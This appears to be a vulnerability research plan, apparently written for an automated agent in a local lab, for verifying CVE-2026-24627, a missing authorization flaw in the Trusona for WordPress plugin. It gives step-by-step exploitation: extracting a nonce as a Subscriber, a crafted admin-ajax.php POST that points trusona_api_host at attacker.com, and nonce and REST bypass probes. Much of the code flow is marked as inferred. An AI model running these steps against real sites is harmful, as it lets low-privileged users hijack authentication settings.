Trusona for WordPress <= 2.0.0 - Missing Authorization

This research plan outlines the technical steps to verify and exploit CVE-2026-24627, a missing authorization vulnerability in the Trusona for WordPress plugin.

1. Vulnerability Summary

The Trusona for WordPress plugin (up to version 2.0.0) fails to implement proper capability checks on administrative AJAX handlers. While these handlers may verify a WordPress nonce for CSRF protection, they do not verify if the authenticated user has the manage_options capability. This allows any authenticated user, including those with Subscriber-level permissions, to execute administrative actions such as modifying plugin settings or triggering API syncs.

2. Attack Vector Analysis

• Endpoint: wp-admin/admin-ajax.php
• Vulnerable Action (Inferred): trusona_save_settings or trusona_sync_users.
• Required Parameter: action, nonce, and setting-specific parameters (e.g., trusona_enabled, trusona_api_secret).
• Authentication: Authenticated (Subscriber level or higher).
• Preconditions: The plugin must be active. The attacker must have a valid login.

3. Code Flow (Inferred)

1. Entry Point: The plugin registers an AJAX handler in a file like includes/admin/class-trusona-admin.php or the main trusona.php file using:
   add_action( 'wp_ajax_trusona_save_settings', array( $this, 'save_settings' ) );
2. Nonce Verification: The save_settings function likely calls check_ajax_referer( 'trusona_save_settings', 'nonce' );.
3. Missing Check: The function proceeds to update plugin options via update_option() without checking if ( current_user_can( 'manage_options' ) ).
4. Sink: User-controlled values in $_POST are saved into the WordPress options table, potentially altering the authentication flow (e.g., pointing Trusona to an attacker-controlled API endpoint).

4. Nonce Acquisition Strategy

To exploit an authenticated AJAX vulnerability, we need a valid nonce. Nonces for administrative actions are often localized and made available to the browser's global scope.

1. Locate Localization: Search for wp_localize_script in the plugin source to find the object name and nonce key.
   • Likely Object Name: trusona_admin or trusona_vars.
   • Likely Key: nonce or trusona_nonce.
2. Identify Page Access: Since Subscribers can access wp-admin/profile.php, check if the plugin enqueues its admin scripts on all admin pages.
3. Extraction Steps:
   • Log in as a Subscriber.
   • Navigate to /wp-admin/profile.php.
   • Use browser_eval to extract the nonce:
     browser_eval("window.trusona_admin?.nonce || window.trusona_vars?.nonce")
4. If Nonce is Action-Specific: If the nonce is strictly tied to trusona_save_settings, it might only appear on the plugin's settings page (which a Subscriber cannot access). In this case, check if the plugin uses a generic nonce (action -1) or if another unprivileged AJAX action leaks a usable nonce.

5. Exploitation Strategy

The goal is to modify the plugin's configuration to disable Trusona or redirect API calls.

• Step 1: Log in as a Subscriber user using the browser_login tool.
• Step 2: Navigate to the Dashboard or Profile page.
• Step 3: Execute browser_eval to find the localized nonce variable.
• Step 4: Send a crafted POST request to admin-ajax.php.

Request Details:

• URL: http://localhost:8080/wp-admin/admin-ajax.php
• Method: POST
• Content-Type: application/x-www-form-urlencoded
• Payload (Example):

  action=trusona_save_settings&nonce=[EXTRACTED_NONCE]&trusona_api_host=attacker.com&trusona_enabled=1
  

6. Test Data Setup

1. Install Plugin: Ensure Trusona version 2.0.0 is installed and activated.
2. Create User: Create a Subscriber user.
   • wp user create attacker attacker@example.com --role=subscriber --user_pass=password123
3. Configure Plugin: Set some initial dummy values for Trusona settings as an admin.
   • wp option update trusona_api_host "api.trusona.com"

7. Expected Results

• Response: The server should return a 200 OK or a JSON success message (e.g., {"success":true}).
• Database Change: The WordPress option trusona_api_host should be updated to the value provided in the Subscriber's request.
• Security Impact: Unauthorized modification of security settings by a low-privileged user.

8. Verification Steps

After sending the AJAX request, verify the change using WP-CLI:

1. Check the modified option:
   wp option get trusona_api_host
2. If the value is attacker.com, the exploitation is successful.

9. Alternative Approaches

• Bypassing Nonces: If check_ajax_referer is called with die = false (e.g., check_ajax_referer('act', 'nonce', false)), the script may continue even with an invalid nonce. Test by omitting the nonce parameter.
• REST API: If the plugin registers REST routes, check for permission_callback. If it is set to __return_true or uses is_user_logged_in(), it is vulnerable.
  • GET /wp-json/trusona/v1/settings
• Action Probing: If trusona_save_settings fails, search the source for other wp_ajax_ hooks that might be missing authorization, such as trusona_sync or trusona_reset.